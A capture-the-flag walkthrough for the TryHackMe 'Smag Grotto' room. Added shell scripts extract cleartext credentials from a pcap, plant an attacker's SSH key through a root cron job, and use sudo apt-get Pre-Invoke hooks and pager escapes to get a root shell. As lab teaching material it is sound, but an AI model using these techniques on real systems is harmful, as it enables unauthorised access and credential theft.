Smag Grotto

https://tryhackme.com/room/smaggrotto

User Flag

As usual, let's start with an nmap scan.

Only two ports are open. Let's head to port 80.

Nothing interesting in sight. Let's try dirsearch.

A /mail/ directory. That could be something. Let's check it.

One of the mails has a pcap file attached. Let's download it and see whether there's anything useful in it.

Using wget:

Fire up Wireshark and let's see what we find.

Now, that's something. The capture contains a hostname and a set of credentials sent in the clear. Add development.smag.thm to your /etc/hosts file, pointing at the target's IP.
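As an added example (not part of the original writeup), here is a small shell helper that pulls the same two things, the Host header and any POSTed form fields, out of the capture from the command line. With tshark installed the first function is the clean route; the second only greps the raw bytes, which works because HTTP/1.x headers and form bodies sit in an unencrypted capture as plain ASCII. The file name smag.pcap and the form field names are assumptions.

```shell
#!/bin/sh
# Added example, not the writeup's own code: extract the vhost and any
# POSTed form credentials from an unencrypted HTTP capture without a GUI.

# Clean route: let tshark dissect HTTP and print the POST host, URI and body.
extract_with_tshark() {
    tshark -r "$1" -Y 'http.request.method == "POST"' \
        -T fields -e http.host -e http.request.uri -e http.file_data
}

# Fallback route: grep the raw bytes (-a treats the binary file as text).
# Prints two kinds of lines: "Host: <name>" (what to add to /etc/hosts) and
# "<field>=<value>&<field>=<value>" form bodies (candidate credentials).
extract_with_grep() {
    grep -a -o 'Host: [A-Za-z0-9._-]*' "$1" | sort -u
    grep -a -o '[A-Za-z_]*=[^&[:space:]]*&[A-Za-z_]*=[^&[:space:]]*' "$1" | sort -u
}

# Use tshark when it is on the box, otherwise fall back to the grep route.
extract_creds() {
    if command -v tshark >/dev/null 2>&1; then
        extract_with_tshark "$1"
    else
        extract_with_grep "$1"
    fi
}

# Usage (file name assumed):  extract_creds smag.pcap
```

The grep fallback is deliberately dumb: it will also print unrelated `a=b&c=d` strings from other requests, so treat its output as candidates to confirm in Wireshark, not as a parsed result.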

Let's check the domain.

Go to the login page and sign in with the credentials we found earlier.

Nice. Now we can try to get a reverse shell with a basic one-liner (start a listener on our side first).

That was easy: the input isn't filtered, so there is nothing to bypass.

The user flag is in Jake's home directory, which our current user can't read, so we need a way to become jake.

A root cron job copies the SSH key backup jake_id_rsa.pub.backup into the .ssh directory in Jake's home, as his authorized_keys. So we generate our own SSH key pair and replace the backed-up public key with ours.

We have write permission on the jake_id_rsa.pub.backup file, so we can overwrite it with our own public key.

Once the file holds our public key, wait up to a minute for the cron job to run, then ssh in as jake with the matching private key.
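The key-replacement step, as an added example that is not from the original writeup. The backup directory /opt/.backups is an assumption; take the real path from the crontab on the box. The helper refuses anything that is not a single OpenSSH public-key line (a malformed authorized_keys costs a full minute per retry) and keeps a copy of the original backup so it can be restored when you are done.

```shell
#!/bin/sh
# Added example, not the writeup's own code: replace the public key that a
# root cron job copies into /home/jake/.ssh/authorized_keys.

# Assumed path; read the real one from the crontab (cat /etc/crontab).
BACKUP=${BACKUP:-/opt/.backups/jake_id_rsa.pub.backup}

# Accept only a single OpenSSH public-key line; anything else makes sshd
# ignore authorized_keys and wastes a cron cycle.
is_pubkey_line() {
    [ "$(wc -l < "$1")" -le 1 ] || return 1
    grep -Eq '^(ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp256) [A-Za-z0-9+/=]+' "$1"
}

# plant_key <our .pub file> <writable backup file>
# Saves the original key to /tmp so the box can be put back afterwards,
# then overwrites the backup; cron copies it within a minute.
plant_key() {
    pub=$1; target=$2
    is_pubkey_line "$pub" || { echo "not a public key: $pub" >&2; return 1; }
    [ -w "$target" ] || { echo "no write access to $target" >&2; return 1; }
    saved="/tmp/$(basename "$target").orig"
    cat "$target" > "$saved" 2>/dev/null || true
    cat "$pub" > "$target"
}

# Usage from the reverse shell (key file names assumed):
#   ssh-keygen -t ed25519 -N '' -f /tmp/jake_key
#   plant_key /tmp/jake_key.pub "$BACKUP"
#   sleep 60 && ssh -i /tmp/jake_key jake@localhost
```

Generating the key pair on the attacking machine and pasting only the .pub line into the backup file works just as well; the private key then never touches the target.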

Grab the flag.

Root Flag

Running sudo -l shows that jake can run apt-get with sudo.

GTFOBins lists a pretty easy privesc for sudo apt-get: either open a package changelog and escape from the pager, or pass a Pre-Invoke hook that runs a shell as root.
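As an added example (not from the writeup), the root step scripted: a helper that extracts the granted binaries from a sudo -l listing, plus the two GTFOBins routes for apt-get. The sudo -l output in the usage comment is constructed; the two apt-get commands are the ones GTFOBins documents.

```shell
#!/bin/sh
# Added example, not the writeup's own code: turn the sudo -l finding into
# a root shell with the apt-get entries from GTFOBins.

# Read a sudo -l listing on stdin and print the binaries it grants, one per
# line. Grant lines look like "    (ALL : ALL) NOPASSWD: /usr/bin/apt-get"
# or "    (root) /usr/bin/vim, /usr/bin/find".
sudo_binaries() {
    sed -E -n 's/^[[:space:]]*\([^)]*\)[[:space:]]*(NOPASSWD:[[:space:]]*)?//p' \
        | tr ',' '\n' | sed 's/^[[:space:]]*//'
}

# Route 1: apt-get feeds the changelog into the pager (less); typing
# !/bin/sh at the pager prompt spawns a shell as root.
root_via_changelog() {
    sudo apt-get changelog apt
}

# Route 2: APT runs Pre-Invoke hooks as root before the update, no pager
# and no network needed because the shell starts before any fetch.
root_via_hook() {
    sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
}

# Usage:
#   sudo -l | sudo_binaries          # expect /usr/bin/apt-get
#   root_via_hook                    # then: id; cat /root/root.txt
```

Run the hook route if the changelog download or the pager is missing on the box; both end with a root shell, so read the flag from there.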
